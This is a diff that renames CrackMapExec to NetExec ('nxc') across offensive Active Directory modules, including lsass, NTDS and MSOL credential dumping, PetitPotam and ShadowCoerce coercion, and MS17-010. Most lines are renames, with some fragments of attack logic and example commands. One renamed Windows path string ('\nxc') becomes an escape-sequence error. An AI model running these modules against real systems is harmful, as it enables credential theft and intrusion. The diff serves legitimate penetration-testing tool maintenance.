Set LHOST and LPORT (called SRVHOST and SRVPORT in CME module options) Set LHOST and LPORT (called SRVHOST and SRVPORT in nxc module options)
Set payload to one of the following (non-exhaustive list): Set payload to one of the following (non-exhaustive list):
windows/x64/powershell_reverse_tcp windows/x64/powershell_reverse_tcp
windows/x64/powershell_reverse_tcp_ssl windows/x64/powershell_reverse_tcp_ssl

View File

@ -9,7 +9,7 @@ import socket
import struct import struct
class CMEModule: class nxcModule:
name = "ms17-010" name = "ms17-010"
description = "MS17-010, /!\ not tested oustide home lab" description = "MS17-010, /!\ not tested oustide home lab"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -1,12 +1,12 @@
# MSOL module for CME # MSOL module for nxc
# Author of the module : https://twitter.com/Daahtk # Author of the module : https://twitter.com/Daahtk
# Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/ # Based on the article : https://blog.xpnsec.com/azuread-connect-for-redteam/
from sys import exit from sys import exit
from os import path from os import path
from cme.helpers.powershell import get_ps_script from nxc.helpers.powershell import get_ps_script
class CMEModule: class nxcModule:
name = "msol" name = "msol"
description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server" description = "Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -4,7 +4,7 @@
# Romain de Reydellet (@pentest_soka) # Romain de Reydellet (@pentest_soka)
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
class User: class User:
@ -21,7 +21,7 @@ class User:
return f"User({self.username})" return f"User({self.username})"
class CMEModule: class nxcModule:
""" """
Enumerate MSSQL privileges and exploit them Enumerate MSSQL privileges and exploit them
""" """
@ -92,7 +92,7 @@ class CMEModule:
elif target_user.dbowner: elif target_user.dbowner:
self.do_dbowner_privesc(target_user.dbowner, exec_as) self.do_dbowner_privesc(target_user.dbowner, exec_as)
if self.is_admin_user(self.current_username): if self.is_admin_user(self.current_username):
self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("CME", "pwn3d_label")))) self.context.log.success(f"{self.current_username} is now a sysadmin! " + highlight("({})".format(self.context.conf.get("nxc", "pwn3d_label"))))
def build_exec_as_from_path(self, target_user): def build_exec_as_from_path(self, target_user):
path = [target_user.username] path = [target_user.username]

View File

@ -1,6 +1,6 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
# nanodump module for CME python3 # nanodump module for nxc python3
# author of the module : github.com/mpgn # author of the module : github.com/mpgn
# nanodump: https://github.com/helpsystems/nanodump # nanodump: https://github.com/helpsystems/nanodump
@ -9,11 +9,11 @@ import sys
import os import os
from datetime import datetime from datetime import datetime
from pypykatz.pypykatz import pypykatz from pypykatz.pypykatz import pypykatz
from cme.helpers.bloodhound import add_user_bh from nxc.helpers.bloodhound import add_user_bh
from cme.protocols.mssql.mssqlexec import MSSQLEXEC from nxc.protocols.mssql.mssqlexec import MSSQLEXEC
class CMEModule: class nxcModule:
name = "nanodump" name = "nanodump"
description = "Get lsass dump using nanodump and parse the result with pypykatz" description = "Get lsass dump using nanodump and parse the result with pypykatz"
supported_protocols = ["smb", "mssql"] supported_protocols = ["smb", "mssql"]
@ -36,7 +36,7 @@ class CMEModule:
def options(self, context, module_options): def options(self, context, module_options):
""" """
TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\) TMP_DIR Path where process dump should be saved on target system (default: C:\\Windows\\Temp\\)
NANO_PATH Path where nano.exe is on your system (default: /tmp/cme/) NANO_PATH Path where nano.exe is on your system (default: /tmp/nxc/)
NANO_EXE_NAME Name of the nano executable (default: nano.exe) NANO_EXE_NAME Name of the nano executable (default: nano.exe)
DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH) DIR_RESULT Location where the dmp are stored (default: DIR_RESULT = NANO_PATH)
""" """
@ -60,13 +60,13 @@ class CMEModule:
else: else:
if sys.platform == "win32": if sys.platform == "win32":
appdata_path = os.getenv("APPDATA") appdata_path = os.getenv("APPDATA")
if not os.path.exists(appdata_path + "\CME"): if not os.path.exists(appdata_path + "\nxc"):
os.mkdir(appdata_path + "\CME") os.mkdir(appdata_path + "\nxc")
self.nano_path = appdata_path + "\CME\\" self.nano_path = appdata_path + "\nxc\\"
else: else:
if not os.path.exists("/tmp/cme/"): if not os.path.exists("/tmp/nxc/"):
os.mkdir("/tmp/cme/") os.mkdir("/tmp/nxc/")
self.nano_path = "/tmp/cme/" self.nano_path = "/tmp/nxc/"
self.dir_result = self.nano_path self.dir_result = self.nano_path

View File

@ -10,7 +10,7 @@ from impacket.krb5 import constants
from impacket.krb5.types import Principal from impacket.krb5.types import Principal
class CMEModule: class nxcModule:
name = "nopac" name = "nopac"
description = "Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user" description = "Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -5,11 +5,11 @@ import time
from impacket.examples.secretsdump import LocalOperations, NTDSHashes from impacket.examples.secretsdump import LocalOperations, NTDSHashes
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
from cme.helpers.misc import validate_ntlm from nxc.helpers.misc import validate_ntlm
class CMEModule: class nxcModule:
""" """
Dump NTDS with ntdsutil Dump NTDS with ntdsutil
Module by @zblurx Module by @zblurx

View File

@ -6,7 +6,7 @@ from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5.rrp import DCERPCSessionError from impacket.dcerpc.v5.rrp import DCERPCSessionError
class CMEModule: class nxcModule:
""" """
Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
Module by @Tw1sm Module by @Tw1sm

View File

@ -19,7 +19,7 @@ from impacket.dcerpc.v5.rpcrt import (
from impacket.uuid import uuidtup_to_bin from impacket.uuid import uuidtup_to_bin
class CMEModule: class nxcModule:
name = "petitpotam" name = "petitpotam"
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam" description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
supported_protocols = ["smb"] supported_protocols = ["smb"]

File diff suppressed because one or more lines are too long

View File

@ -16,7 +16,7 @@ KNOWN_PROTOCOLS = {
} }
class CMEModule: class nxcModule:
""" """
Check if vulnerable to printnightmare Check if vulnerable to printnightmare
Module by @mpgn_x64 based on https://github.com/ly4k/PrintNightmare Module by @mpgn_x64 based on https://github.com/ly4k/PrintNightmare

File diff suppressed because one or more lines are too long

View File

@ -7,11 +7,11 @@ from math import fabs
import re import re
class CMEModule: class nxcModule:
''' '''
Created by fplazar and wanetty Created by fplazar and wanetty
Module by @gm_eduard and @ferranplaza Module by @gm_eduard and @ferranplaza
Based on: https://github.com/juliourena/CrackMapExec/blob/master/cme/modules/get_description.py Based on: https://github.com/juliourena/NetExec/blob/master/nxc/modules/get_description.py
''' '''
name = 'pso' name = 'pso'

View File

@ -7,10 +7,10 @@ from dploot.triage.backupkey import BackupkeyTriage
from dploot.lib.target import Target from dploot.lib.target import Target
from dploot.lib.smb import DPLootSMBConnection from dploot.lib.smb import DPLootSMBConnection
from cme.helpers.logger import highlight from nxc.helpers.logger import highlight
class CMEModule: class nxcModule:
name = "rdcman" name = "rdcman"
description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials" description = "Remotely dump Remote Desktop Connection Manager (sysinternals) credentials"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -3,7 +3,7 @@
from sys import exit from sys import exit
from cme.connection import dcom_FirewallChecker from nxc.connection import dcom_FirewallChecker
from impacket.dcerpc.v5 import rrp from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations from impacket.examples.secretsdump import RemoteOperations
@ -13,7 +13,7 @@ from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
class CMEModule: class nxcModule:
name = "rdp" name = "rdp"
description = "Enables/Disables RDP" description = "Enables/Disables RDP"
supported_protocols = ["smb" ,"wmi"] supported_protocols = ["smb" ,"wmi"]
@ -31,9 +31,9 @@ class CMEModule:
METHOD wmi(ncacn_ip_tcp)/smb(ncacn_np) (choices: wmi, smb, default is wmi) METHOD wmi(ncacn_ip_tcp)/smb(ncacn_np) (choices: wmi, smb, default is wmi)
OLD For old version system (under NT6, like: server 2003) OLD For old version system (under NT6, like: server 2003)
DCOM-TIMEOUT Set the Dcom connection timeout for WMI method (Default is 10 seconds) DCOM-TIMEOUT Set the Dcom connection timeout for WMI method (Default is 10 seconds)
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=smb ACTION={enable, disable, enable-ram, disable-ram}
cme smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5} nxc smb 192.168.1.1 -u {user} -p {password} -M rdp -o METHOD=wmi ACTION={enable, disable, enable-ram, disable-ram} {OLD=true} {DCOM-TIMEOUT=5}
""" """
if not "ACTION" in module_options: if not "ACTION" in module_options:
context.log.fail("ACTION option not specified!") context.log.fail("ACTION option not specified!")

View File

@ -6,7 +6,7 @@ from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations from impacket.examples.secretsdump import RemoteOperations
class CMEModule: class nxcModule:
name = "reg-query" name = "reg-query"
description = "Performs a registry query on the machine" description = "Performs a registry query on the machine"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -2,7 +2,7 @@
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
class CMEModule: class nxcModule:
name = "runasppl" name = "runasppl"
description = "Check if the registry value RunAsPPL is set or not" description = "Check if the registry value RunAsPPL is set or not"
supported_protocols = ["smb"] supported_protocols = ["smb"]

View File

@ -80,7 +80,7 @@ def searchResEntry_to_dict(results):
return data return data
class CMEModule: class nxcModule:
name = "get-network" name = "get-network"
description = "" description = ""
supported_protocols = ["ldap"] supported_protocols = ["ldap"]
@ -183,7 +183,7 @@ class CMEModule:
) )
context.log.highlight("Found %d records" % len(outdata)) context.log.highlight("Found %d records" % len(outdata))
path = expanduser("~/.cme/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S"))) path = expanduser("~/.nxc/logs/{}_network_{}.log".format(connection.domain, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
with codecs.open(path, "w", "utf-8") as outfile: with codecs.open(path, "w", "utf-8") as outfile:
for row in outdata: for row in outdata:
if self.showhosts: if self.showhosts:

View File

@ -5,7 +5,7 @@ import ntpath
from sys import exit from sys import exit
class CMEModule: class nxcModule:
""" """
Original idea and PoC by Mubix "Rob" Fuller Original idea and PoC by Mubix "Rob" Fuller
URL: https://room362.com/post/2016/smb-http-auth-capture-via-scf/ URL: https://room362.com/post/2016/smb-http-auth-capture-via-scf/

View File

@ -14,10 +14,10 @@ from impacket.dcerpc.v5.rpcrt import (
RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_GSS_NEGOTIATE,
) )
from impacket.smbconnection import SessionError from impacket.smbconnection import SessionError
from cme.logger import cme_logger from nxc.logger import nxc_logger
class CMEModule: class nxcModule:
name = "shadowcoerce" name = "shadowcoerce"
description = "Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam" description = "Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam"
supported_protocols = ["smb"] supported_protocols = ["smb"]
@ -229,7 +229,7 @@ class CoerceAuth:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost) rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
cme_logger.info("Connecting to %s" % binding_params[pipe]["stringBinding"]) nxc_logger.info("Connecting to %s" % binding_params[pipe]["stringBinding"])
try: try:
dce.connect() dce.connect()
@ -239,20 +239,20 @@ class CoerceAuth:
dce.disconnect() dce.disconnect()
return 1 return 1
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
cme_logger.info("Connected!") nxc_logger.info("Connected!")
cme_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0]) nxc_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0])
try: try:
dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"])) dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"]))
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s" % str(e)) nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
cme_logger.info("Successfully bound!") nxc_logger.info("Successfully bound!")
return dce return dce
def IsPathShadowCopied(self, dce, listener): def IsPathShadowCopied(self, dce, listener):
cme_logger.debug("Sending IsPathShadowCopied!") nxc_logger.debug("Sending IsPathShadowCopied!")
try: try:
request = IsPathShadowCopied() request = IsPathShadowCopied()
# only NETLOGON and SYSVOL were detected working here # only NETLOGON and SYSVOL were detected working here
@ -261,14 +261,14 @@ class CoerceAuth:
# request.dump() # request.dump()
dce.request(request) dce.request(request)
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s", str(e)) nxc_logger.debug("Something went wrong, check error status => %s", str(e))
cme_logger.debug("Attack may of may not have worked, check your listener...") nxc_logger.debug("Attack may of may not have worked, check your listener...")
return False return False
return True return True
def IsPathSupported(self, dce, listener): def IsPathSupported(self, dce, listener):
cme_logger.debug("Sending IsPathSupported!") nxc_logger.debug("Sending IsPathSupported!")
try: try:
request = IsPathSupported() request = IsPathSupported()
# only NETLOGON and SYSVOL were detected working here # only NETLOGON and SYSVOL were detected working here
@ -276,8 +276,8 @@ class CoerceAuth:
request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
dce.request(request) dce.request(request)
except Exception as e: except Exception as e:
cme_logger.debug("Something went wrong, check error status => %s", str(e)) nxc_logger.debug("Something went wrong, check error status => %s", str(e))
cme_logger.debug("Attack may of may not have worked, check your listener...") nxc_logger.debug("Attack may of may not have worked, check your listener...")
return False return False
return True return True

View File

@ -6,7 +6,7 @@ import ntpath
from sys import exit from sys import exit
class CMEModule: class nxcModule:
""" """
Original idea and PoC by Justin Angel (@4rch4ngel86) Original idea and PoC by Justin Angel (@4rch4ngel86)
Module by @byt3bl33d3r Module by @byt3bl33d3r

View File

@ -6,7 +6,7 @@ import errno
import os import os
import time import time
import traceback import traceback
from cme.protocols.smb.remotefile import RemoteFile from nxc.protocols.smb.remotefile import RemoteFile
from impacket.smb3structs import FILE_READ_DATA from impacket.smb3structs import FILE_READ_DATA
from impacket.smbconnection import SessionError from impacket.smbconnection import SessionError
@ -497,7 +497,7 @@ class SMBSpiderPlus:
self.logger.success("All files processed successfully.") self.logger.success("All files processed successfully.")
class CMEModule: class nxcModule:
""" """
Spider plus module Spider plus module
Module by @vincd Module by @vincd
@ -517,7 +517,7 @@ class CMEModule:
EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk) EXCLUDE_EXTS Case-insensitive extension filter to exclude (Default: ico,lnk)
EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$) EXCLUDE_FILTER Case-insensitive filter to exclude folders/files (Default: print$,ipc$)
MAX_FILE_SIZE Max file size to download (Default: 51200) MAX_FILE_SIZE Max file size to download (Default: 51200)
OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/cme_spider_plus) OUTPUT_FOLDER Path of the local folder to save files (Default: /tmp/nxc_spider_plus)
""" """
self.download_flag = False self.download_flag = False
if any("DOWNLOAD" in key for key in module_options.keys()): if any("DOWNLOAD" in key for key in module_options.keys()):
@ -530,7 +530,7 @@ class CMEModule:
self.exclude_filter = get_list_from_option(module_options.get("EXCLUDE_FILTER", "print$,ipc$")) self.exclude_filter = get_list_from_option(module_options.get("EXCLUDE_FILTER", "print$,ipc$"))
self.exclude_filter = [d.lower() for d in self.exclude_filter] # force case-insensitive self.exclude_filter = [d.lower() for d in self.exclude_filter] # force case-insensitive
self.max_file_size = int(module_options.get("MAX_FILE_SIZE", 50 * 1024)) self.max_file_size = int(module_options.get("MAX_FILE_SIZE", 50 * 1024))
self.output_folder = module_options.get("OUTPUT_FOLDER", os.path.join("/tmp", "cme_spider_plus")) self.output_folder = module_options.get("OUTPUT_FOLDER", os.path.join("/tmp", "nxc_spider_plus"))
def on_login(self, context, connection): def on_login(self, context, connection):

View File

@ -17,7 +17,7 @@ KNOWN_PROTOCOLS = {
} }
class CMEModule: class nxcModule:
""" """
For printnightmare: detect if print spooler is enabled or not. Then use @cube0x0's project https://github.com/cube0x0/CVE-2021-1675 or Mimikatz from Benjamin Delpy For printnightmare: detect if print spooler is enabled or not. Then use @cube0x0's project https://github.com/cube0x0/CVE-2021-1675 or Mimikatz from Benjamin Delpy
Module by @mpgn_x64 Module by @mpgn_x64

View File

@ -13,7 +13,7 @@ def searchResEntry_to_dict(results):
return data return data
class CMEModule: class nxcModule:
""" """
Retrieves the different Sites and Subnets of an Active Directory Retrieves the different Sites and Subnets of an Active Directory

Some files were not shown because too many files have changed in this diff Show More